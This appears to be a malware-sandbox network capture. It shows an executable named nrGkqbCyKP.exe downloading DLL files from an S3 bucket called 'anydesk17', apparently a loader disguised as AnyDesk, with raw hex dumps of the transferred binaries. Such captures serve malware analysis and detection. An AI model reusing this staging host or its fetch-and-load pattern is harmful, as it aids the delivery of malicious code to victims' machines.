                                                                                                                                                                          2024-12-18 12:06:01 UTC16384INData Raw: 8b 06 48 63 48 04 48 03 ce 83 49 10 02 48 83 79 08 00 75 04 83 49 10 01 45 84 ff 75 19 48 8b 06 48 63 48 04 48 03 ce 83 49 10 04 48 83 79 08 00 75 04 83 49 10 01 48 8b 7c 24 48 48 8b c6 48 8b 5c 24 40 48 8b 6c 24 50 48 83 c4 20 41 5f 41 5e 5e c3 48 8b 06 48 63 48 04 48 8b 54 31 08 48 8b 42 10 48 3b 42 18 75 0b 48 8b 02 48 8b ca ff 50 40 eb c3 48 ff c0 48 89 42 10 eb ba cc cc cc 48 89 4c 24 08 48 83 ec 48 48 c7 44 24 20 fe ff ff ff 48 8b c2 48 8d 54 24 68 48 89 54 24 28 48 89 4c 24 30 48 85 c9 74 36 48 8d 15 b8 5c 0e 00 48 89 11 33 d2 48 89 51 08 88 51 10 48 8b 40 08 48 85 c0 74 06 4c 8b 40 08 eb 03 4c 8b c2 48 85 c0 74 03 48 8b 10 41 b1 01 e8 c2 e8 ff ff 90 48 83 c4 48 c3 cc cc cc cc cc cc cc cc cc cc cc cc 40 53 55 56 57 41 54 41 56 41 57 48 83 ec 30 48
                                                                                                                                                                          Data Ascii: HcHHIHyuIEuHHcHHIHyuIH|$HHH\$@Hl$PH A_A^^HHcHHT1HBH;BuHHP@HHBHL$HHHD$ HHT$hHT$(HL$0Ht6H\H3HQQH@HtL@LHtHAHH@SUVWATAVAWH0H
                                                                                                                                                                          2024-12-18 12:06:01 UTC1024INData Raw: 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c4 78 41 5f 41 5e 41 5d 41 5c 5f 5e 5b 5d c3 cc cc cc cc 40 57 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 89 5c 24 40 49 8b f9 49 8b d8 4c 8b 02 4d 85 c0 74 16 49 8b 40 08 48 63 48 04 49 83 c0 08 49 03 c8 48 8b 01 ff 50 08 90 48 8b 13 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 8b 17 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 8b 5c 24 40 48 83 c4 30 5f c3 cc 40 57 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 89 5c 24 40 49 8b f9 49 8b d8 4c 8b 02 4d 85 c0 74 16 49 8b 40 08 48 63 48 04 49 83 c0 08 49 03 c8 48 8b 01 ff 50 08 90 48 8b 13 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48
                                                                                                                                                                          Data Ascii: tHBHcHHHHPHxA_A^A]A\_^[]@WH0HD$ H\$@IILMtI@HcHIIHPHHtHBHcHHHHPHHtHBHcHHHHPH\$@H0_@WH0HD$ H\$@IILMtI@HcHIIHPHHtHBHcHHHH
                                                                                                                                                                          2024-12-18 12:06:01 UTC16384INData Raw: ab 0b 00 48 89 45 a8 33 c9 48 89 08 48 89 48 08 48 89 48 10 40 88 7d b0 44 8b cf 4c 8b 45 a8 48 8b d3 48 8b ce e8 d9 99 01 00 48 8d 75 a0 eb 14 48 8b 12 48 8d 4d b8 e8 a3 92 ff ff 48 8b f0 bf 02 00 00 00 89 7d 38 49 8b d6 48 8d 4d d8 e8 3c e1 ff ff 48 8b d8 48 8d 55 d0 49 8b cf e8 cd e1 ff ff 90 4c 8b cb 4c 8d 45 e0 48 8b d6 48 8b 08 e8 0a 41 01 00 90 48 8b 4d d0 48 85 c9 74 07 48 8b 01 ff 50 08 90 48 8b 45 d8 48 85 c0 74 16 48 8b 48 08 48 63 51 04 48 8d 48 08 48 03 ca 48 8b 01 ff 50 08 90 40 f6 c7 02 74 31 83 e7 fd 4c 89 65 b8 48 8b 4d c0 48 85 c9 74 21 80 7d c8 00 74 13 e8 31 99 01 00 ba 18 00 00 00 48 8b 4d c0 e8 67 a9 0b 00 4c 89 6d c0 c6 45 c8 00 40 f6 c7 01 74 2e 4c 89 65 a0 48 8b 4d a8 48 85 c9 74 21 80 7d b0 00 74 13 e8 fd 98 01 00 ba 18 00 00 00
                                                                                                                                                                          Data Ascii: HE3HHHHH@}DLEHHHuHHMH}8IHM<HHUILLEHHAHMHtHPHEHtHHHcQHHHHP@t1LeHMHt!}t1HMgLmE@t.LeHMHt!}t
                                                                                                                                                                          2024-12-18 12:06:01 UTC1024INData Raw: 00 48 2b 37 ba 32 00 00 00 48 8b cf e8 1e 52 ff ff 48 8b 0f 48 3b 77 08 73 12 48 8d 14 31 41 b8 32 00 00 00 ff 15 bd d0 0d 00 eb 2b 0f 10 05 34 b7 1d 00 0f 11 01 0f 10 0d 3a b7 1d 00 0f 11 49 10 0f 10 05 3f b7 1d 00 0f 11 41 20 0f b7 05 44 b7 1d 00 66 89 41 30 48 8b 07 c6 40 32 00 48 c7 47 08 32 00 00 00 48 8d bb c0 01 00 00 48 89 6f 08 48 8d 47 18 48 89 07 4c 89 77 10 c6 00 00 48 8d 35 19 b7 1d 00 48 2b 37 ba 31 00 00 00 48 8b cf e8 99 51 ff ff 48 8b 0f 48 3b 77 08 73 12 48 8d 14 31 41 b8 31 00 00 00 ff 15 38 d0 0d 00 eb 2a 0f 10 05 e7 b6 1d 00 0f 11 01 0f 10 0d ed b6 1d 00 0f 11 49 10 0f 10 05 f2 b6 1d 00 0f 11 41 20 0f b6 05 f7 b6 1d 00 88 41 30 48 8b 07 c6 40 31 00 48 c7 47 08 31 00 00 00 48 8d bb e8 01 00 00 48 89 6f 08 48 8d 47 18 48 89 07 4c 89 77
                                                                                                                                                                          Data Ascii: H+72HRHH;wsH1A2+4:I?A DfA0H@2HG2HHoHGHLwH5H+71HQHH;wsH1A18*IA A0H@1HG1HHoHGHLw
                                                                                                                                                                          2024-12-18 12:06:01 UTC1749INData Raw: 83 ec 38 48 c7 44 24 20 fe ff ff ff 48 8b 11 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c4 38 c3 48 83 ec 38 48 c7 44 24 20 fe ff ff ff 48 8b 11 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c4 38 c3 48 83 ec 38 48 c7 44 24 20 fe ff ff ff 48 8b 11 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c4 38 c3 48 83 ec 38 48 c7 44 24 20 fe ff ff ff 48 8b 11 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c4 38 c3 48 83 ec 38 48 c7 44 24 20 fe ff ff ff 48 8b 11 48 85 d2 74 16 48 8b 42 08 48 63 48 04 48 83 c2 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c4 38 c3 48 83 ec 38 48 c7 44 24 20 fe ff ff ff 48 8b 11
                                                                                                                                                                          Data Ascii: 8HD$ HHtHBHcHHHHPH8H8HD$ HHtHBHcHHHHPH8H8HD$ HHtHBHcHHHHPH8H8HD$ HHtHBHcHHHHPH8H8HD$ HHtHBHcHHHHPH8H8HD$ H
                                                                                                                                                                          2024-12-18 12:06:01 UTC9000INData Raw: 04 48 8b 4c 11 48 48 85 c9 74 07 48 8b 01 ff 50 10 90 48 83 c4 38 c3 cc cc cc 40 53 48 83 ec 30 48 c7 44 24 20 fe ff ff ff 48 8b d9 ff 15 d8 c4 0d 00 90 84 c0 75 0a 48 8b 0b ff 15 f2 c4 0d 00 90 48 8b 13 48 8b 02 48 63 48 04 48 8b 4c 11 48 48 85 c9 74 07 48 8b 01 ff 50 10 90 48 83 c4 30 5b c3 cc cc cc cc cc cc cc cc 40 57 48 83 ec 40 48 c7 44 24 20 fe ff ff ff 48 89 5c 24 50 48 89 74 24 58 48 8b f9 48 8b 02 48 89 44 24 28 4c 8b 42 08 33 c9 48 89 0a 48 89 4a 08 48 89 07 48 8b 4f 08 48 89 4c 24 30 4c 89 47 08 48 85 c9 74 33 83 ce ff 8b c6 f0 0f c1 41 08 83 f8 01 75 24 48 8b 5c 24 30 48 8b 03 48 8b cb ff 50 10 f0 0f c1 73 0c 83 fe 01 75 0c 48 8b 4c 24 30 48 8b 01 ff 50 18 90 48 8b c7 48 8b 5c 24 50 48 8b 74 24 58 48 83 c4 40 5f c3 cc cc cc cc 48 89 5c 24 18
                                                                                                                                                                          Data Ascii: HLHHtHPH8@SH0HD$ HuHHHHcHHLHHtHPH0[@WH@HD$ H\$PHt$XHHHD$(LB3HHJHHOHL$0LGHt3Au$H\$0HHPsuHL$0HPHH\$PHt$XH@_H\$
                                                                                                                                                                          2024-12-18 12:06:01 UTC16384INData Raw: 8d 46 f8 49 3b c4 74 21 e9 bd fe ff ff ff 15 57 a4 0d 00 cc ff 15 50 a4 0d 00 cc ff 15 49 a4 0d 00 cc ff 15 42 a4 0d 00 90 4c 8b 65 b7 48 8b 5d af 48 85 db 0f 84 ab 00 00 00 49 3b dc 74 1a 0f 1f 00 48 8b 03 33 d2 48 8b cb ff 10 48 83 c3 18 49 3b dc 75 ed 48 8b 5d af 48 8b 4d bf 48 2b cb 48 b8 ab aa aa aa aa aa aa 2a 48 f7 e9 48 c1 fa 02 48 8b c2 48 c1 e8 3f 48 03 d0 48 b8 aa aa aa aa aa aa aa 0a 48 3b d0 76 07 ff 15 da a3 0d 00 cc 48 8d 04 52 48 c1 e0 03 48 3d 00 10 00 00 72 3c f6 c3 1f 74 07 ff 15 be a3 0d 00 cc 48 8b 43 f8 48 3b c3 72 07 ff 15 ae a3 0d 00 cc 48 2b d8 48 83 fb 08 73 07 ff 15 9e a3 0d 00 cc 48 83 fb 27 76 07 ff 15 91 a3 0d 00 cc 48 8b d8 48 8b cb e8 5d 3c 0b 00 49 8b c7 48 8b 4d 17 48 33 cc e8 ee 3b 0b 00 48 8b 9c 24 e0 00 00 00 48 81 c4
                                                                                                                                                                          Data Ascii: FI;t!WPIBLeH]HI;tH3HHI;uH]HMH+H*HHHH?HHH;vHRHH=r<tHCH;rH+HsH'vHH]<IHMH3;H$H
                                                                                                                                                                          2024-12-18 12:06:01 UTC1024INData Raw: 90 48 8b 08 48 8b 01 ff 90 78 01 00 00 90 48 8b 44 24 40 48 85 c0 74 16 48 8b 48 08 48 63 51 04 48 8d 48 08 48 03 ca 48 8b 01 ff 50 08 90 48 83 c4 38 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc c2 00 00 cc cc cc cc cc cc cc cc cc cc cc cc cc 40 57 48 83 ec 60 48 c7 44 24 20 fe ff ff ff 48 89 5c 24 78 49 8b f8 48 8b d9 49 8b 10 48 8d 4c 24 40 e8 69 e4 fe ff 90 8b 57 2c 8b 47 28 33 c9 48 89 4c 24 30 48 89 4c 24 38 48 8d 0d 7f 3f 1d 00 48 89 4c 24 28 89 44 24 30 89 54 24 34 48 8b 8b 10 01 00 00 48 8b 01 48 8d 54 24 70 ff 10 90 48 8b 08 48 8b 01 44 0f b6 4f 30 4c 8d 44 24 28 48 8d 54 24 40 ff 90 70 01 00 00 90 48 8b 44 24 70 48 85 c0 74 16 48 8b 48 08 48 63 51 04 48 8d 48 08 48 03 ca 48 8b 01 ff 50 08 90 48 8d 05 0d 3f 1d 00 48 89 44 24 28 48 8d 05 69 6a
                                                                                                                                                                          Data Ascii: HHxHD$@HtHHHcQHHHHPH8@WH`HD$ H\$xIHIHL$@iW,G(3HL$0HL$8H?HL$(D$0T$4HHHT$pHHDO0LD$(HT$@pHD$pHtHHHcQHHHHPH?HD$(Hij


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          1192.168.2.84971252.95.160.784431644C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-18 12:06:07 UTC72OUTGET /libcef.dll HTTP/1.1
                                                                                                                                                                          Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                                                                                                          2024-12-18 12:06:08 UTC426INHTTP/1.1 200 OK
                                                                                                                                                                          x-amz-id-2: dx49aNYVGYRP9+acXyxhnIwSqn4oGcww4XXlQI7dfI3gT13nrO7dcRMmqQ96i8Q4NfhvO6Fgvlw=
                                                                                                                                                                          x-amz-request-id: 08GVENWDRGZWW4K0
                                                                                                                                                                          Date: Wed, 18 Dec 2024 12:06:09 GMT
                                                                                                                                                                          Last-Modified: Sat, 07 Dec 2024 17:32:42 GMT
                                                                                                                                                                          ETag: "d7b50924ab14320b946526eb3db6a08f"
                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Content-Type: binary/octet-stream
                                                                                                                                                                          Content-Length: 271126
                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                          Connection: close
                                                                                                                                                                          2024-12-18 12:06:08 UTC16384INData Raw: 1f 8b 08 00 00 00 00 00 04 00 ec bd 09 7c 54 d5 dd ff 7f 66 92 81 b0 25 11 09 06 50 3b 6a d0 b8 80 81 20 06 01 99 48 82 13 0d 10 21 48 44 34 09 c9 84 a4 26 99 71 16 08 b8 41 03 96 38 46 63 ab ad 5d 5c aa b6 5a 5b 5b 6a 7d 04 dc 1a 44 25 28 2a b8 b4 b8 54 a9 f5 d1 8b b1 16 77 6c ad f3 ff 7e cf 39 f7 ce 9d 25 88 ed f3 7b fd ff bf e7 ff 79 c3 99 7b ef d9 d7 ef 59 ef cd dc 25 3d 22 43 08 91 49 2a 16 13 62 b3 50 78 c4 d7 93 ef 10 22 fb 5b 0f 65 8b 07 86 3c 7b cc 66 47 e5 b3 c7 54 37 b7 84 dc 81 a0 7f 79 b0 be cd dd 50 df de ee 0f bb 97 f9 dc c1 48 bb bb a5 dd 5d 36 7f a1 bb cd df e8 9b 38 62 c4 d0 02 ed c7 8f 5b fd 1b de 18 e1 78 cd 54 7f 8a 7c ef b5 3d 74 bd b6 c3 f5 ea 2b f2 ea 7c f5 75 79 15 af b2 fe 4d 11 f5 7c 53 c4 a5 af e2 d5 3f 49 b7 e2 b5 9f 4b 7b 99
                                                                                                                                                                          Data Ascii: |Tf%P;j H!HD4&qA8Fc]\Z[[j}D%(*Twl~9%{y{Y%="CI*bPx"[e<{fGT7yPH]68b[xT|=t+|uyM|S?IK{
                                                                                                                                                                          2024-12-18 12:06:08 UTC598INData Raw: 6c ef 03 eb d5 58 fb 09 8a 50 f1 2a 1a 43 5d a3 fc fd 01 dd ff cc f6 7c 98 0c 3b 4b 0c 5d 30 28 c0 6e 78 ef f8 35 32 ff 07 a9 98 b6 b3 8b ee 47 ae a6 be 36 aa 9e c7 d1 fd f1 ab e3 e6 fc 7c 82 cd 7c c8 d8 41 62 ec 94 1c 31 36 38 7a ef a8 c0 e1 75 ec 2f c7 f3 22 b2 33 fb 32 ca b3 a8 ba ca f4 2f 70 56 39 72 06 89 1c 8a 7b 0e c5 9d fb 38 99 2e ee 9f a8 f0 1d 59 99 22 2b 98 19 c8 a8 a3 7c 1a 91 29 46 4c 19 22 46 90 5c 19 c2 e6 d4 8f 99 7e f3 1f 8f b9 8f d4 b2 a8 ba ca bc ab e2 be 23 4b 8c a2 7c 1b 45 f9 36 8a fc 1f 35 99 fa 91 3c 17 e5 d3 43 22 cf b1 59 0c 62 3b 32 7c 52 53 5c 22 67 a4 0a 5f 32 49 5d 02 f7 a6 f6 cf 3c 8f e8 21 fd cd a4 f6 a6 31 67 36 e8 39 94 39 7e e7 b1 4a dd 29 89 76 78 bc be 39 8d 3d 77 92 3d 66 6f 1a 7b 7b d3 d8 5b 13 51 d7 c2 5f a5 9a 71
                                                                                                                                                                          Data Ascii: lXP*C]|;K]0(nx52G6||Ab168zu/"32/pV9r{8.Y"+|)FL"F\~#K|E65<C"Yb;2|RS\"g_2I]<!1g699~J)vx9=w=fo{{[Q_q
                                                                                                                                                                          2024-12-18 12:06:09 UTC16384INData Raw: 90 fa 11 a9 ad a4 de 26 35 8c c6 7e 47 93 9a 48 6a 2e a9 7a 52 2b 48 75 93 ba 8d d4 26 52 7b 48 fd 8d d4 11 db 28 ff 48 cd 21 d5 4c aa 9b d4 6f 49 bd 44 ea 03 52 83 9f a0 bc 21 35 85 d4 39 a4 6a 49 85 49 75 91 ba 8d d4 03 a4 9e 26 f5 26 a9 8f 49 0d 7e 92 d2 4f 6a 22 a9 d9 a4 2e 22 d5 41 ea 7b a4 36 92 7a fe 49 fe 12 25 75 3c 4f 51 9a 49 15 93 5a 48 2a 48 ea 06 52 bf 25 f5 1c a9 f7 49 65 6c a7 7e 96 d4 04 52 67 93 aa 27 b5 9a d4 f7 49 fd 92 d4 a3 a4 76 93 7a 8f 14 0d f2 45 3e a9 53 48 79 48 5d 40 ea 52 52 37 93 da 44 6a 0f a9 bf 91 8a 91 ca de 41 f5 99 d4 74 52 f3 49 2d 25 75 29 a9 f5 a4 7e 48 ea 97 a4 1e 23 f5 2a a9 4f 48 8d 7a 9a d2 4f ea 1c 52 17 93 5a 41 ea 06 52 7d a4 be 20 55 f0 0c d5 a9 67 f8 54 34 e5 07 a9 c7 49 ed 22 f5 0e a9 ac 9d 42 9c 44 6a 36
                                                                                                                                                                          Data Ascii: &5~GHj.zR+Hu&R{H(H!LoIDR!59jIIu&&I~Oj"."A{6zI%u<OQIZH*HR%Iel~Rg'IvzE>SHyH]@RR7DjAtRI-%u)~H#*OHzORZAR} UgT4I"BDj6
                                                                                                                                                                          2024-12-18 12:06:09 UTC1024INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          2024-12-18 12:06:09 UTC16384INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa 0a 7b 70 20 00 00 00 00 00 e4 ff da 08 aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                                                                                                          Data Ascii: {p
                                                                                                                                                                          2024-12-18 12:06:09 UTC1024INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          2024-12-18 12:06:09 UTC1749INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          2024-12-18 12:06:09 UTC9000INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          2024-12-18 12:06:10 UTC16384INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                                                                                                          Data Ascii:
                                                                                                                                                                          2024-12-18 12:06:10 UTC1024INData Raw: aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa aa
                                                                                                                                                                          Data Ascii:


                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                          2192.168.2.8497183.5.239.1464431644C:\Users\user\Desktop\nrGkqbCyKP.exe
                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                          2024-12-18 12:06:21 UTC74OUTGET /MSVCP140.dll HTTP/1.1
                                                                                                                                                                          Host: anydesk17.s3.ap-east-1.amazonaws.com
                                                                                                                                                                          2024-12-18 12:06:22 UTC446INHTTP/1.1 200 OK
                                                                                                                                                                          x-amz-id-2: XG5nDOE2vU0xV823i87yA6EIRXzgo+RS5Y/9LvI7TAu++f9Rmh9PRFbzKAIk8mLux6QeYuSDu8X1tINqd8ouNGRk3Vj0KFJ6
                                                                                                                                                                          x-amz-request-id: P1RR2W74N748Q169
                                                                                                                                                                          Date: Wed, 18 Dec 2024 12:06:22 GMT
                                                                                                                                                                          Last-Modified: Wed, 20 Nov 2024 18:57:22 GMT
                                                                                                                                                                          ETag: "c1b066f9e3e2f3a6785161a8c7e0346a"
                                                                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                          Content-Type: binary/octet-stream
                                                                                                                                                                          Content-Length: 627992
                                                                                                                                                                          Server: AmazonS3
                                                                                                                                                                          Connection: close
                                                                                                                                                                          2024-12-18 12:06:22 UTC16384INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 60 b2 81 72 24 d3 ef 21 24 d3 ef 21 24 d3 ef 21 90 4f 00 21 26 d3 ef 21 2d ab 7c 21 32 d3 ef 21 76 bb ee 20 27 d3 ef 21 24 d3 ee 21 e1 d3 ef 21 76 bb ec 20 27 d3 ef 21 76 bb eb 20 6f d3 ef 21 76 bb ea 20 6a d3 ef 21 76 bb ef 20 25 d3 ef 21 76 bb 10 21 25 d3 ef 21 76 bb ed 20 25 d3 ef 21 52 69 63 68 24 d3 ef 21 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 64 86 07
                                                                                                                                                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$`r$!$!$!O!&!-|!2!v '!$!!v '!v o!v j!v %!v!%!v %!Rich$!PEd
                                                                                                                                                                          2024-12-18 12:06:22 UTC578INData Raw: fd ff ff e9 80 00 00 00 4c 8b 7c 24 70 4c 8b f3 49 c1 e6 03 48 8b d7 4d 8b c6 49 8b cf 4f 8d 24 3e e8 9a 8e 04 00 f2 0f 10 16 8b d3 48 8b cf e8 80 fd ff ff 4c 8b ed 48 83 fd 01 7e 4b bd 01 00 00 00 f2 0f 10 04 ee 66 0f 2e 05 61 f4 04 00 7a 02 74 35 4d 8b c6 49 8b d7 49 8b cc e8 5f 8e 04 00 f2 0f 10 14 ee 8b d3 49 8b cc e8 44 fd ff ff 44 8b cb 4d 8b c4 8b d3 48 8b cf e8 bc fb ff ff 48 ff c5 49 3b ed 7c ba 48 8b 5c 24 50 48 8b c7 48 8b 6c 24 58 48 8b 74 24 60 48 83 c4 20 41 5f 41 5e 41 5d 41 5c 5f c3 40 53 48 83 ec 20 66 41 0f 6e d0 48 8b d9 f3 0f e6 d2 e8 09 00 00 00 48 8b c3 48 83 c4 20 5b c3 48 8b c4 48 89 58 18 55 56 57 48 83 ec 30 33 ed 0f 29 70 d8 f2 0f 11 50 08 0f 28 f2 8b f2 48 8b d9 85 d2 0f 8e cf 00 00 00 83 fa 01 0f 84 c2 00 00 00 48 8d 50 08 48
                                                                                                                                                                          Data Ascii: L|$pLIHMIO$>HLH~Kf.azt5MII_IDDMHHI;|H\$PHHl$XHt$`H A_A^A]A\_@SH fAnHHH [HHXUVWH03)pP(HHPH
